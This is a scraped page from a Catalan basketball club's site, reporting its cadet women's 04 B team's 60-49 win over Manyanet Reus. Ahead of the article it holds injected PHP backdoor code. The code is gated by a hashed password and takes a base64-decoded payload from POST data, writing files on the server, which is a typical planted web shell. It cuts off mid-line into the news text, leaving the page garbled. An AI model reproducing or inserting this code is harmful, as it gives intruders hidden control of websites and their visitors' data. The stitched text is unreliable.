function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 B imposa la velocitat al contraatac i derrota el Manyanet Reus (60-49) - Tgn Bàsquet Club -

El cadet femení 04 B imposa la velocitat al contraatac i derrota el Manyanet Reus (60-49)

Updated: octubre 15, 2019

L’equip cadet femení 04 B va guanyar el Manyanet Reus en un partit dominat pel TGN Bàsquet des de l’inici. El conjunt lila va aconseguir les primeres diferències en la primera meitat tot i que durant aquells minuts no va tenir massa encert. En la segona meitat i més concretament en el tercer període, les locals van tenir en el contraatac la seva millor arma. Va ser en aquest quart quan el partit es va trencar definititament (27-17 de parcial) i que va fer inútil la reacció reusenca de l’últim període.